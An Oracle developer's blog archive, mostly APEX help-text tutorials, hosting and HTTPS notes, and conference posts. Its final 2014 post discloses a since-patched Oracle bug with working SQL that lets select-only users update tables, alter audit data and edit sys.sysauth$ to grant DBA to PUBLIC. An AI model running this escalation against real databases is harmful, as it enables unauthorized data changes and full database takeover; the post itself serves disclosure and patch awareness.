Mathias Magnusson

Subscribe to Mathias Magnusson feed
Changing the world, one line of code at a time
Updated: 7 months 1 week ago

ODC Appreciation Day: Old Blog Posts

Thu, 2018-10-11 15:17

FIrst of all, kudos to  Tim Hall. This is one of the great times of the year when all these thankful blogs are posted in a day. If you read nothing else in the blogs all year, picking some of them would not be a bad choice.

Speaking of which, I will talk about being thankful for blogs in general. No, not about the new ones explaining all the new features we get in new versions. While that is very fascinating and motivates me to play with new tech, it is not the great thing with blogs.

What I think is great with blogs is old blogs. Yes, there may be few things as unsexy as old forgotten blog posts.

When there is an issue to resolve or a concept to get up to speed on, there are few things better than the blogs written  a year or ten ago. But are not everyone experts on everything when some time has passed. Nope, not even one person is a specialist on every facet of Oracle database technology.

Sometimes it is one thing one knows fairly well but needs a to understand edge cases, experiences, when not to use and so forth. Then a short google session generates a reading list as good as any book.

A few examples of blogs I have stumbled on that was not published this year but that provided great information and input follows. They are just things from the top of my mind when thinking back about such blogs.

Tobias Arnhold wrote about views provided by APEX. It shows a SQL listing all the views and shows the views hierarchical relationship. Not only was that useful, but a side effect was that I realized this was available as well as that the relationship could be found in metadata. It is a post over six years old, often thought of long forgotten. Still very applicable. In fact,  Tobias may even have forgotten the post himself, it is even more applicable today as there have been a lot of views added to the ones available back in 2012,

Another  great one is Connor McDonalds@connor_mc_d –post from early 2016 on auditing row changes. It is a great collection of all the things provided to uyou to avoid auditing columns, tables, triggers and so forth. Including a complete test case and demo from start to finish. Still two years old, but when needed it is a great start.

Then there are of course classics like Toon Koppelaars blog The Helsinki Declaration (IT-Version) that starts with the IT-version of it. If you have not read the four posts it consists of, you owe it to yourself to do so. Go back to the beginning. It should be mandatory reading for how to build database intensive applications.

I leave it at those to not extend this post more than necessary. But it shows the value of the combined effort of the community to write down small and big things as we come across them. There is immense value in those posts long after they have been written. Some are even more valuable a few years later when the world and the technology has matured enough to make it mainstream.

#ThanksODC

 

 

Customized help text in APEX

Wed, 2018-05-09 07:00

Yes, I’m finally back. The last post was written right before a complete period of offline before it was even scheduled to be published. That followed with slowly getting back. I have been fully recovered for a while but not gotten back enough to find time to blog. That changes now. So what causes almost a half years time to recover. Going out with the trash. Yes, it really is dangerous and should be avoided at all costs. What was really dangerous was the part of falling and acquiring a serious concussion. That was not made any better when I fell again a week later to get another severe concussion. I strongly advise against acquiring even mild concussions.

I’ll finish up this series about help texts with customized help text. The dedicated, in-line, modal, and non modal variants I’ve covered has all been declarative. Now we’ll take a look at what can be done if we want to not just modify with how it is shown to the user, but how it also looks.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com.

As I’ve stated before, my preferred way to deal with help text in APEX applications is to do it with inline help as the this blog post discussed. I have honestly never had to use this custom version in any real application. I imagine a lot can be done with just customizing CSS to make the help text show as one ants. But I guess for a customer that really want to control this, this option may come in handy.

There is a procedure provided with APEX for this. It is APEX_APPLICATION.HELP. it has this signature (taken from the linked documentation).

p_request              IN VARCHAR2 DEFAULT NULL,
p_flow_id              IN VARCHAR2 DEFAULT NULL,
p_flow_step_id         IN VARCHAR2 DEFAULT NULL,
p_show_item_help       IN VARCHAR2 DEFAULT 'YES',
p_show_regions         IN VARCHAR2 DEFAULT 'YES',
p_before_page_html     IN VARCHAR2 DEFAULT '<p>',
p_after_page_html      IN VARCHAR2 DEFAULT NULL,
p_before_region_html   IN VARCHAR2 DEFAULT NULL,
p_after_region_html    IN VARCHAR2 DEFAULT'</td></tr></table></p>',
p_before_prompt_html   IN VARCHAR2 DEFAULT '<p><b>',
p_after_prompt_html    IN VARCHAR2 DEFAULT '</b></p>:&nbsp;',
p_before_item_html     IN VARCHAR2 DEFAULT NULL, 
p_after_item_html      IN VARCHAR2 DEFAULT NULL

p_request is not used.

p_flow_id and p_step_id is application id and page id respectively.

p_show_item_help controls if help about individual items should be shown.

P_show_regions controls if information about each regions should be shown.

The remaining parameters have one before and one after parameter of each kind. The control what html we want to have injected before or after a certain element on the page.

p_xxxxxx_page_html controls what is put before the page info and what is put after the whole help text (the page info is considered to include regions and items).

The remaining parameters are conditional, such that the content is ignored when one of p_show_item_info and p_show_regions is set to something other than ‘YES’.

p_show_reqions has to be YES for these to be considered:

  • p_before_region_html
  • p_after_region_html

They control what HTML to inject before and after each region help text.

p_show_item_help has top be yes for these to be considered:

  • p_before_promt_html
  • p_after_prompt_html
  • p_before_item_html
  • p_after_item_html

The prompt ones controls what is injected before and after the label for each page item. The item ones control what is injected before and after the actual help text for each item.

Rather than describing how to build this, I recommend that you look at it on my demo application. The demo application allows you to play with all the above parameters and see the effect it has.

Watch it live

Take a minute and check out this live in my demo application to see for yourself how this can be used. Log in with demo/demo.

Help text as a modal dialog

Wed, 2018-01-03 04:00

To continue on the theme of help text in APEX, lets take a look at showing it in a modal popup dialog in this post and then finish off the subject in next post with cusomizing how help can be shown.

Screen Shot 2017-12-30 at 22.16.47

For completeness I’ll include a short section towards the end about how it works in non modal too.

In the last post I show how to show help text inline on a page and on the one before that how to set up a specific page to be the landing page for showing help text for any page in the application. In this post I’ll show how to get help text displayed in a modal dialog.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com.

As I’ve stated before, my preferred way to deal with help text in APEX applications is to do it with inline help as the last blog post discussed. But sometimes a dedicated page is preferable and sometimes a modal popup dialog is better. I think those cases might be preferred in cases where the help includes a lot of text and sdeeing the actual page at the same time is not needed. For example if the text more explains a concept than how to fill out the fields in the page.

We will set up another page with just a help region. We could make a copy of the page we created in the first post in this series, but to make this post more self contained we’ll create the page from scratch.

Creating the modal help page

Create a new blank page (I’ll use 4 in this example). Chose modal page type.

  • Add a “Help Text” region to the content body.
  • Name = Help
  •  If you did not get the page created as modal, go to the page attributes.
    • Find The Appearence group.
    • Page type = Modal Dialog

This is identical to the page 2 created in the post about help on a dedicated page with just the page type changed to be modal.

Create a button to show the modal help

We’ll first create a button just to show the machanics just because it is the easiest way to test it. After that we’ll finish off the access to help with a navigation bar entry, just as we did in the previous two posts.

Open the page from which you want to open the help. If you’ve followed along on the previous posts, it would be page 3. Any page for which yiou have some help text defined on the page attributes will do. That is needed just so we can see it work.

  • Add a text button to any region you have on the page.
  • Set the page to redirect to a page in this application
  • Set the page to be page 4
  • Open the advanced group in the popup
  • Request = &APP_PAGE_ID.

Test the page and see that when you click the button you get a modal popup page with the helptext for the page you button is on.

With this working we know the mechanics of this works, now we just need a navigation bar set up for it so it becomes available across the whole application.

Create a navigation bar entry

As before, we’ll finish off this version too with a navigation bar entry. It is by far the most natural way to provide a natural way for a user to request help on a page and for it to be available verywhere in an application.

Since the difference against the navigation bar entry for the dediczated page is largely that the page that is linked is defined as a normal or modal page, this pretty much a repeat of that.

Go to shared components and click on Navigation Bar List, and then on Desktop Navigation Bar. Click Create Entry and set:

  • Sequence = 50
  • List Entry Label = Modal Help
  • Target Type = Page in this Application
  • Page = Your modal help page (4)
  • Request = &APP_PAGE_ID.

If you run the application now you will see “Modal Help” up in the navigation bar, and clicking it takes has the same exact result as the button. It shows the help in a modal dialog by pulling up page 4 as a popup over the page your requested help from (3).

Now any new page you create for which you write help text will let the user click on the navigation bar and get the help text with no extra effort from you.

What about non modal?

Well, there is of course the option of a non modal page type too. The result of it is a stand alone window you can move around and keep referencing while navigating in the application.

To set it up we’ll just copy the page, button and navigationb bar entries.

Copy the page we created here (4) to a new one (5) and give it the name “Non Modal Help”, accept all other attributes and just click forward and create the page.

In page attributes:

  • Change the page type to  “Non-Modal Dialog”.
  • Set width to 700
  • Set height to 600

Go to your page in the application (3 if you have followed along) and copy the button “Modal”.

  • Name = “NonModal”.
  • Sequence = 80.
  • Target->Page = 5.

Test it to see your button creating a new window with the helptext.

Go to the shared components -> Navigation Bar List -> Desktop Navigation Bar

  • Click copy icon on the right side for “Modal Help”
  • Display Sequence = 60
  • New List Entry Label = Non Modal Help
  • Click “Copy List Entry”
  • Click “Non Modal Help”
  • Set Target->Page = 5

Now you’ve got a non modal help option in the navigation bar too. Try it out.

Watch it live

Take a minute and check out this live in my demo application to see for your self the effect of it before you build it yourself. Log in with demo/demo.

Help text in APEX in-line with page

Wed, 2017-12-27 04:00

Setting up help text in APEX is not hard but I often see it not done at all or implemented using regions with static content and then toggled on or off. That is unfortunate when there is declarative support for providing help texts.

In the last post I show how to set up a specific page to be the landing page for showing help text for any page in the application. In this post I’ll show how to get help text displayed inline with a page the user is on.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com. The following has been the same since at least release 3.2 of Apex while where and how you enter the needed properties may not be identical in previous and future releases. I don’t think it has changed much over the years.

Show help in-line

It is often preferable to be able to see the help on the page you want to know how it works. If you have it on another page like I showed in the last post, you often end up going there reading a bit and then go back to look only to repeat that a number of times.

What if you could see the help on the page you’re on? Sometimes that is much better.

Setting up the global page

The basis for this is using the global page to have a halp region be available on every page in the application (unless you restrict it).

Create a global page if you do not have one in your application. Then add a “help text region” to the Content body of the global page. Name it “Info” and a sequence of 0 to make sure it is the very first region in the content body.

If you run the application now, every page shows the help text for it’s page. So it is already working, but we want the user to select when it is to be displayed.

We will use a page item to define when the help is shown and when it is not.

Creating the page item

Lets create a page item “AI_SHOW_HELP” to let us control when help is shown.

Go to the shared objects:

  • Click on “Shared Components”.
  • Click on “Application Items”.
  • Click Create
  • Name = AI_SHOW_HELP
  • Session State Protection = Checksum Required – Session Level
  • Click Create Applöication Item
Set default value for AI_SHOW_HELP

To make sure the application shows with help not being displayed, we’ll set up an application computation to default the application item to N.

  • Click on “Shared Components”.
  • Click on “Application Computations”.
  • Click Create
  • Computation Item = AI_SHOW_HELP
  • Computation Point = On New Instance (New Session)
  • Computation Type = Static Assignment
  • Computation = N
  • Click Create Computation
Set a condition for when to show the help text region

With the Application Item in place and dafaulting it to not show help, we just need to set the condition on the help text region on the global page to only show when AI_SHOW_HELP has a value different from N. To make sure it is only shown when we have requrésted it, we check for it being Y rather than just not being N.

  • Open the global page in the page designer (editing the page)
  • Click on the help text region (named Info above)
  • Scroll down to  Server Side Condition group among the regions properties
  • Type = “Item = Value”
  • Item = AI_SHOW_HELP
  • Value = Y
  • Click Save

If you now run the application, the help will no longer show on any of your pages. The reason is of course that we default AI_SHOW_HELP to “N” while only showing the help text when it is set to “Y” without any means to set it to “Y”.

What we need now is a way for the user to toggle AI_SHOW_HELP between “Y” and “N”

Navigation bar entry to toggle help on or off

The way to create a toggle in the navigation bar is to have two entries and only show the one the reverses the current selection, i.e. if AI_SHOW_HELP is “Y” then let it be “N” and vice versa.

Head back to shared components and click on “Navigation Bar List”, and click on “Navigation Bar List” in the report to go to editing the entries in the navigation bar.

  • Click “Create Entry”
  • Sequence = 30
  • List Entry Label = Show Help
  • Target Type = Page in this Application
  • Target = &APP_PAGE_ID.
  • Set these items = AI_SHOW_HELP
  • With these values = Y
  • Conditions = Value of Item/Column in Expression 1 is != Expression 2
  • Expression 1 = AI_SHOW_HELP
  • Expression 2 = Y
  • Click Create List Entry

Now we have a navigation bar entry (high up right where the logout link is) that toggles help on and that is only shown when help is not shown.

Run the application and click “Show Help” in the navigation bar to see the inline help being visible again. There is then – yet – no means to turn off the help.

Now that it works we need to create one more entry that does the reverse. It is shown when help is visible to allow the user to hide the help again.

Return to the edit window and lets set up a reverse navigation bar entry of the one we just created.

The easy way to do it is to click the copy icon on the right side on the row for “Show Help”. Do that and enter the following values.

  • Sequence = 40
  • New List Entry Label = Hide Help
  • Click Copy List Entry

Now lets edit the few things we need.

  • Click “Hide Help” in the report over navigation bar entries.
  • In Target section, set “With these values” = N
  • In Conditions, set “Expression 2” = N
  • Click Apply Changes

That is it, the application now has a toggle between Show Help and Hide Help to toggle showing help about pages inline in the application. Note that it is an application wide setting, so once on it remains active until the user turns it off. Thus, if you turn it on and move around in the application, the help will show on every page until you decide to turn it off and not show help anymore.

Watch it live

As I said in the last post I have set up a demo-app I’ll use to show the effects when I blog about things APEX where it makes sense to have a an app to show the feature. For the above, take a look at it. Log in with demo/demo.

 

Help text in APEX on a dedicated page

Wed, 2017-12-20 04:00

Setting up help text in APEX is not hard but I often see it not done at all or implemented using regions with static content and then toggled on or off. That is unfortunate when there is declarative support for providing help texts.

In this post I’ll show how to set up a specific page to be the landing page for showing help text for any page in the application. It is the precursor to the next post where I’ll take it a step further and show how to get help text displayed inline with a page the user is on.

For this blog I used version 5.1.4.00.08 of APEX on apex.oracle.com. The following has been the same since at least release 3.2 of Apex while where and how you enter the needed properties may not be identical in previous and future releases. I don’t think it has changed much over the years.

Show help using another page

The following information is to a large extent a click stream version of Oracles official documentation.

The number in the parenthesis are example page numbers just to make sure there is no confusion of what page is referenced. It is the page numbers you’d end up with in a brand new application

Set up two pages

Create a blank page (2) and then add a help text region to the content body of the page. This is the page that will be used to display the halp for any page in the application.

Create another blank page (3) and scroll down to the bottom and fill in help text about the page in the “Help Text” property.

Help text location

Now we have everything needed in place, we just have to add any means of navigation to get the help page (2) to be loaded with the helptext of this page (3). Typically this is done with a link in the navigation bar as we’ll see later, but it is often easier to just try out navigation with a plain button.

Add Navigation

Add a button and label it OtherPage. Set the target to be the page number of the help page you just created (2). Set the request (in 5.1 under the advanced catagory) to “&APP_PAGE_ID.”.

Run the page (3) and click the button. You will be sent to your help page (2) where the helptext you entered for the page (3).

If you add items on your page (3) the help text for those will also be shown on your help page. You will however not want to create a help button on every page in your application. It would both wast real estate on your page as well as time to set it up on every single page.

Navigation bar

To make the help for every page in your application be displayed with no additional work per page other than writing the help text, let’s set up an entry on the navigation bar.

Go to shared components and clock on Navigation Bar List, and then on Desktop Navigation Bar. Click Create Entry and set:

  • Sequence = 20
  • List Entry Label = Help Page
  • Target Type = Page in this Application
  • Page = Your help page (2)
  • Request = &APP_PAGE_ID.

Editing navbar for help page

If you run the application now you will see “Help Page” up in the navigation bar, and clicking it takes has the same exact result as the button. It navigates to he help page (3) and shows the help text for your page (2).

Now any new page you create for which you write help text will let the user clock on the navigation bar and get the help text with no extra effort from you.

Watch it live

I have just set up a demo-app I’ll use to show the effects when I blog about things APEX where it makes sense to have a an app to show the feature. For the above, take a look at it. Log in with demo/demo.

 

Database is the marquee feature again

Sun, 2017-10-01 17:37

So every year before and during Oracle Open World we all complain about how data and database is brushed to the side.

This year it is the feature. It is the one thing the big sign on Moscone West screams. “The Autonomous Database”

Here is a picture from showing it. It is all about database.

Every year there is talk about how Oracle needs to return to data and databases. Now that they do, I think we should be very happy even if we suspect the actual feature isn’t what we would have requested.

Any day Oracle talks about database is a day they’re not spending on forgetting it.

Spam killed

Sun, 2017-05-21 16:51

After I moved my blog to self-hosting, it has attracted more and more spam. It started slow and very manageable. After my last blog post it got really bad. What started as a few spam messages a week, culminated with 30-40 spam comments per day. At that point I had completely lost any ability to sort through it.

‘I was so disheartened by this that blogging didn’t happen as I knew I had to solve this first. I thought solving it required paying for Akismet and that annoyed me. I pay for my hosting and domain and so forth, but paying just to get rid of comments meant to abuse my blog felt wrong especially as the blog does not have that much traffic that it felt reasonable to have to filter spam.

I kn ew I had to do something this weekend and after just a little bit of googling I had seen a few recommendations for Anti-Spam by Webvitaly. After reading up it seemed like a very promising option. Since spam engines does not do JavaScript, it places a hidden field on  the comment form and the populates it with the correct answer when someone submits a comment, but the spam engines puts no or bad data in it so the comment is just ignored.

After installing it 36 hours ago, it has filtered out 60 comments and not let through a single spam comment. I say it does the trick for what I need. I can go back to blogging about Oracle and other technologies I fancy, instead of being forced to deal with spam comments.

If you need to filter spam and be able to not even review them, based on my experience this far I’d definitely recommend you to look at this plug-in.

Speaking at DOAG and RMOUG rocked

Tue, 2017-03-14 04:50

As I wrote a while back I was accepted to speak both at the User Group Leader summit at DOAG16 and at RMOUG Training Days.

The first one was a short presentation where I talked about a large bug in Oracle security and the need to patch and upgrade to not have that exposure. It was great fun as it was limited to a four-minute talk. I learned a lot from preparing for it as that short time allows for no questions and no spur of the moment comments. Each slide has to be carefully timed to make sure the time is enough for all slides.

The last one was about a customer case where a severe performance issue was handled where I talk about all the assumptions we challenged in the process of resolving it. The job took 36 hours and it could only use 8 and soon the amount of work was expected to double. It ended up taking just a few minutes when we were done. Part regular tuning and part using the “magic” of the EXADATA.

While the talk ended up having few attendees – competing with Maria Colgan and Graham Wood is tough – it was a great experience. I have not presented at a conference this big before. Training Days is also a conference that scares me to present at. I lived in Denver and my respect for the conference, the presenters and the quality expected is almost at an unhealthy level. So being there to present was a way to slay a dragon of mine. I had a great time at the conference and I enjoyed presenting. Even though I did not have an oversubscribed room, those who came seems to have enjoyed the session as I was rewarded with a 9.0 rating for the talk.

If you’re thinking about maybe going to Training Days next year, my advice is to do it. It is a great conference and it is extremely well-organized. It is small enough to know the layout and the rooms fast, while still being big enough to have a lot of great talks to choose from every session. There were several where I wanted to go to three and I still regret having missed those where 2-3 fantastic sessions were held at the same time.

I really liked the effort made to make the biggest names available and approachable by everyone by having them have their own tables at lunch time and letting people sit at the table where one of the persons they respect the most sits. I really enjoyed my lunch at Cary Millsap’s table. It was a great group and a very inspiring discussion about performance and discussing old battles in the field.

It is far away, but I’ll be back. I had a blast.

Signing up for scary stuff

Sun, 2016-11-06 15:03

So I subscribe to the idea that the only way to improve is to dive in on the deep end. Sink or swim.

With that in mind I sent in an abstract to RMOUG and actually got it accepted. Now, this is a conference I used to attend every year when I lived in Denver. I know the quality they have in most presentations nad I know that lots of people with “important” names in the community attends. I have to up my game and give myself a chance to be embarrassed. It scares and motivates me in equal amounts.

Talking about that feeling, I watched the quick presentation at the OOW 2016 – “EOUC Database ACES Share Their Favorite Database Things”. I was impressed by how they managed to keep those presentations to just five minutes and still get a great message across. I figured that would be a great thing to practice. I’m going to the DOAG conference in a week and before it starts there is a day for user group leaders. I’ll attend that and on the agenda there is a 30-minute slot with 4-minute presentations. Even less than they gave the ACED presenters at OOW. Not really knowing what I’m getting myself into, I tossed my name into that ring also.

Hopefully I get to make a try at that too. There will be just a few days of prep. Maybe that is just as well so I do not find time to chicken out. Standing in front of all the group leaders in Europe with just a couple of evenings to prep will be nerve-wracking. But again, if one wants to improve, one has to test those wings.

Hopefully I’ll get through those without too many scars. I look forward tremendously to both conferences for the meetings as well as for the chance at possibly present at both conferences.

OTN Appreciation Day – The Community

Tue, 2016-10-11 07:00

So this is my post aboout my favorite feature of my favorite product. I can hear a lot of you say “The community is not a feature of the database or any other product”?

That is your opinion, I think it is the greatest one. I’d say that the mostly friendly Oracle community is by far the most important driver for quality solutions. I know I have and still do learn more from the community than from any manual.

I began using Oracle AskTom back when I started with Oracle. Tom was nice enough to start it up just months before I joined the fun in the Oracle world. From there I started finding all the amazing blogs that let me dig deeper and deeper into the database. Part of finding that community was fidning great presenters at Training Days that RMOUG holds every year. Those two days used to be the professional highlight of the year while I was based in Denver, CO.

My manager at the time used to comment that where she and others just saw a technology I referred to the community over and over. That is how I see it, when people talk about Oracle I think about the company and the community first and about the specific technology after that.

That is still the case to the point where I today try to create a community where one is missing. That one is just a very small piece in the bigger world wide community of Oracle professionals. The user group scene is one of the greatest opportunities available to learn more and to get a chance to share the knowledge one happens to pick up.

Not only is taking part in the community one of the greatest opportunities available to learn critical skills in the technology you focus on, presenting in it on thing you think you know forces you to learn even more about it. It is also a great way to start building a network to others who enjoy sharing and debating technical aspects of Oracle technologies.

Another part of the community is OTN who sponsors a large part of the things that makes the community “one” community. Things like the ACE-program that awards some of the best in the community the ACE-title for their ability to share and educate. The ability for user groups to have ACE Directors to visit and hold a couple of presentations is a fantastic thing for every member of a user group.

Going to conferences and when I get a chance to present at them is one of the things I enjoy the most. That is when you really feel the power of the community. I feel we have too little of it in Sweden, so to see and feel how great it is in other places provides a lot of motivation to bring people together in one in Sweden.

If you are not feeling part of the user group community, sign up with your local user group. Start reading blogs, get on twitter and start following some of the greats. From there you’ll find more and more interesting sites, people and blogs to follow.

I’ll refrain from name dropping the guys and gals I follow. If you know me, you’ll know who anyway. If not, search for your favorite topics within Oracle on Twitter or google it followed by twitter or some other social network name and you’ll find lots twitterites or bloggers writing about the stuff that inspires you.

If you still want a list of where to start, hit me up and I’ll get you a good starting point from where to expand your horizons.

Getting from http to https

Sun, 2016-09-11 13:02

The world is moving to https, but that was not the reason for the move.

Initially I was happy to use whatever Digital Ocean (DO) supplied in the WordPress droplet. But as I explained in my last post, I had some problems with moving from wordpress.com to my self hosted site at DO.

In short the problem turned out to be Chrome caching sites that accepts https making my site unavailable to every visitor that has been to my site in the past including myself. It seemed like DO forced https but had not configured the droplet fully. That was not the case at all, it was configured for http, but not for https and doing that was well documented.

Had I understood that and what happened from the beginning it would have made this so much easier, but I only realized what Chrome did a couple of minutes after my troubleshooting and fixing what I thought was a half baked config. It would have saved me from spinning up about five extra droplets, reading a lot more about Apache2 than I really needed. However, I learned a lot so it was good that I mistook what happened for being something the droplet did.

To make it work I started with performing the work of the initl server setup they recommended. Most of it was things I knew I ought to do so it made sense, but the real reason was that the https-post they had referred to is as the inital step. So I followed it just to make sure I did not miss a required step.

Then I ran four commands to make Apache load ssl and configure virtual servers for it.

cd /etc/apache2/mods-enabled
ln -s ../mods-available/ssl.conf
ln -s ../mods-available/ssl.load
ln -s ../mods-available/socache_shmcb.load
cd /etc/apache2/sites-enabled
ln -s ../sites-available/default-ssl.conf

In hindsight I’ve realized that the proper way to enable modifications would have been to just do “a2enmod ssl”. However, I have not tried that in a fresh droplet so I leave that here just as a suggestion.

All that remains now is to use yet another fantastic writeup DO provides. It shows how to create a free ssl certificate using Let’s Encrypt and configure Apache to use it including how to make it renew automatically. It is easy, fast and works with no complication at all. At least it did for me.

In addition to Digital Ocean that I find extremely impressive, Let’s Encrypt is by far one of the most impressive sites I’ve found recently that I never knew existed. I recommend everyone to go there and read up on what they do and how it works.

Full disclosure: The links to Digital Ocean (DO) in this article uses my referal link. Using that I get a discount from them and so do you. I had this post planned before I happened to get a referral-id the other day, they are quite honestly one of the most impressive destinations for IT-geeks I can think of. Go check them out using my referral or just enter digitalocean.com into your favorite webbrowser (that link is referal free – use the other to save money).

Moving to selfhosted and failing hard

Mon, 2016-09-05 01:05

I had decided to move one of my blogs to a self-hosted model to get more control over plugins and other things. After reading up a bit on different vendors I found Digital Ocean to be my choice. What’s not to like with a place that can spin up a complete Linux with WordPress installed and ready for me to use? Yes, it only takes them seconds and it is powered by SSD. Adding that it costs $10 per month ready to go and for $2 a month they include a preconfigured weekly backup. Seeing this and knowing it is lightning fast, I could not think of a reason to try someone else.

So I took my domain “mathiasmagnusson.com” that has just a couple of pages and no blog posts. All blogging is done on sub domains on that. This should be easy and let me test the move without interrupting the other blogs, right? It was easy, I imported the site from wordpress.com, set a new theme, and made a few different tweaks. Accessing it by ip-address worked great, it was everything it used to be and looked better. Yes, that is probably because it wasn’t a piece of art before the move (either).

Now all that was left was to point the DNS A-record to my new place. Or so I thought. I started with pointing the DNS at there using local name resolution (/etc/hosts) and a made up name “mywp” and it worked perfectly even after changing the name in WordPress for where it was located so all pages was linked to using mywp instead of the ip. Time to change GoDaddy to point to the ip of my new site. After doing that the site worked on ip, but failed on access with name. It reloaded using https and I got a connection refused message. As the tab showed the WordPress logo, I made the conclusion that it must be WordPress sending back a redirect on http when accessed with a public name.

I started a service ticket with Digital Ocean and we got to over 15 replies over the weekend where they did the best they could to get more and more info from me and why I think it is their server acting up and me trying as hard as I could to prove what was self evident to me – of course it had to be on their server or network, it was a connection refused and a reload with https. Nothing else in the chain would do that.

At this point I spun up server after server proving to myself that this could be proven without doing anything more than just getting the server created and then using local name resolution. At the same time I did a deep dive inte the WordPress code, reading on ssl, certificates, how it should work. I found that it has snake oil certs installed and it really seems like the https stuff is half baked, but why is not the Internet littered with posts about it? As I depart on the SSL-stuff the discussion on why it even happens continues. I will explain that first and get to what I learned and did with SSL later.

It turns out that Chrome has a cache for sites/pages you have visited before that was serving https then. So it is nice enough to silently rewrite all such page requests for you. Normally this is a great function. But when you move from a place that used https (wordpress.com) to one that does not like my new site, it makes all accesses to pre existing pages fail. The exact opposite of what one wants, the intent is to make such a move transparent to all visitors.

Chrome even has a function to add sites/pages to the cache so you can try breaking things for yourself. Should you have this problem or want to play with this, go to chrome://net-internals/#hsts and add or remove. If you encounter the issue with automatic rewrites by chrome, you want to remove the site here.

There is a feature meant to help in that it lets sites tell chrome to always enforce https for it. That is a good thing, until it moves and the site still has the same exact name. Then it can make every reader of your site/blog unable to read it. Thus, moving from a https-capable site that uses HSTS – HTTP Strict Transport Security – to one only capable of http can make your readers lose access completely if they are not aware of this and most of them will not be.

This has become a very long post now, so the explanation for how I got my site https-capable will be written up in its own post.

Hello world!

Sun, 2016-09-04 14:14

Welcome to mathiasmagnusson Sites. This is your first post. Edit or delete it, then start blogging!

An old dog learns a new trick

Mon, 2016-02-29 05:00

Reports of this blogs death have been greatly exaggerated. It has been very quiet here though while I worked on getting the Swedish part of Miracle started. It is now rocking the Stockholm market so it’s time to get back into more geeky stuff.

Talking of which. I have encountered Liquibase for database versioning time after time and always come to the conclusion that it is not what a DBA want to use. I recently took it out for a spin to prove once and for all that it is not capable of what real DBAs need.

Well, lets just say that it did not end like I expected. The phrase, an old dog learns a new trick comes to mind. Once I got over the idea that it is the DDL I have to protect and realised that it is rather control over how changes occur I need. In fact I get all the control I need and a lot of problems with being able to back out changes and to adopt for different kinds of environments and/or database types are easily handled.

Do take it out for a spin, you’ll like it.

If you read Swedish, I wrote a document with a full demo of lots of the features. You find it here. It is a long document, partly because it has a long appendix with a changelog and partly because I step through each change (of 37) and explain them.

I also show how APEX applications can be installed with Liquibase. This is often said to not work, you have to do it by hand with APEX. Well, not only is it possible – it is easy.

I’d translate the demo and the document to English if that would be useful to many people. Let me know if this sounds like a document you’d like to see in English.


Is your database secure? Are you sure? Are you *really* sure?

Wed, 2014-06-18 08:47

A friend and at the time co-worker at Kentor AB found this bug. He found the bug and had the tenacity to track down and prove that it was a bug and not just a flaw in the logging mechanism where this first was indicated to occur.

Today is the day when I can finally speak about a bug I asked for a peer review on over a year ago. I had to pull that blog post offline when it was clear that we had in deed found what I think is a monster bug. It was difficult to fix so while it was quiet online about the bug, Oracle was hard at work on fixing it. In fact it turned out to be two different bugs each plugged separately.

Before we get to the meat of the issue, have you applied the January 2014 CPU? No? OK, we’ll wait while you take care of that. Trust me, you want to have it installed. Back already? Good. Patching really doesn’t take too long. :-)

I’ve spent a number of years trying to very diligently apply the correct grants for different users to make sure every user had just what they needed. It turns out it was a wasted effort. Had the users known about this bug, they could have circumvented their lack of access. Truth be told, I really have no idea if someone did. In fact the bug was such that it was abused in production at a large Oracle shop by mistake. This bug is present in all versions of the database (as far as we know) and it has been fixed with the latest CPU for 11g and 12c. If you run on an older version, you should upgrade now! Running older than 11 at this point probably means you’re not reading blogs about databases anyway.

So what exactly is the bug then? In short, you can update data in tables you only have select rights on. How can that be, you’ve tested that multiple times. True, the SQL has to be written in a pretty specific way to trigger the bug. In a database that is a base install or at least predates the january CPU, the following test case should prove the issue. You can use most of this to verify the problem, you will probably not ant to test with privilege escalation in a production system though.

Let us first create som users for our test.

drop user usra cascade;
create user usra identified by usra default tablespace users;
alter user usra quota unlimited on users;
grant connect to usra;
grant create table to usra;
--
drop user usrb cascade;
create user usrb identified by usrb;
grant connect to usrb;
grant create view to usrb;
--
drop user usrc cascade;
create user usrc identified by usrc;
grant connect to usrc;
grant select any dictionary to usrc;

We create a user usra that can create tables, usrb that can create views and usrc that can only select from the dictionary. These users will allow us to test the different versions of this bug in a controlled fashion.

Lets set up a test table in the usra account.
create table t1 (col_a varchar2(10) not null);
insert into t1 (col_a) values ('Original');
--
commit;
--
grant select on t1 to usrb;

We now have a table with a single row that usrb can only read from, or so we would think. Let us first create a very basic view and try to update it.
drop view view1;
create view view1 as select * from usra.t1;
update view1 set col_a = 'Whoops1';

So that didn’t work. Or rather, the view was created but the update failed. That is how it should be, we have no update access on the table.

Lets now try to create a view on that view which we then update to see what happens if we add just a little bit of complexity to this.

drop view view2;
create view view2 as select * from view1 where col_a in (select max (col_a) from view1 group by col_a);
update view2 set col_a = 'Whoops2';

This update suddenly works (before the above mentioned CPU). So our meticulously granted privileges are overridden by a view with a sub-select on the same view. Not good.

Could the sub-select be simplified? Does it need to select from the same view and is an aggregation needed to make this bug expose itself?

drop view view3;
create view view3 as select * from view1 where 1 in (select 1 from dual);
update view3 set col_a = 'Whoops3';

Apparently it could not be simplified enough to just do a sub-select from dual. On to other possible simplifications.

What if we just read a hard-coded value from the first row in the table, would that work?
drop view view4;
create view view4 as select * from view1 where 1 in (select 1 from view1 where rownum = 1);
update view4 set col_a = 'Whoops4';

Yup, that is enough to break through the privileges.

How about just using a select without even having to have the right to create a view?
update
(with x as (select * from usra.t1) select * from x) t1
set col_a = 'Whops5';

Ouch. That too was possible. So all it takes is a select access on a table and we can update it. How do we stop someone from abusing this when not even a pure select with no right to create objects is enough? You see why we pulled the original blog-post? This was for a time something that would be very hard to defend your database against.

How about using it to update things in the data dictionary, yes that too is possible. Some things are available to any user such as user_actions.

update
(with x as (select * from audit_actions) select * from x) t1
set name = 'Mathias was here';

This update also works. So auditing can be changed, probably not a good thing if you trust your audit_actions table.

How about escalating the privileges we have (or rather that anyone has). Yes, that is also possible with a bit of knowledge.

select * from sys.sysauth$
where grantee# = (select user_id from all_users where username = 'HR')
and rownum = 1;

Here we steal a privilege held by the HR user, probably a privilege that will not be missed for a long time in most databases. With this we will make public a proper DBA user meaning that any account can do almost anything in the database.

update
(with x as (select * from sys.sysauth$ where grantee# = 103 and privilege# = -264 and sequence# = 1551)
select * from x) t1
set grantee# = 1
,privilege# = 4;

Just like that we have given ourselves and everyone else DBA access. Now we can do whatever we want including covering our tracks in most databases.

So I ask again, are you *really* sure that your database is secure?

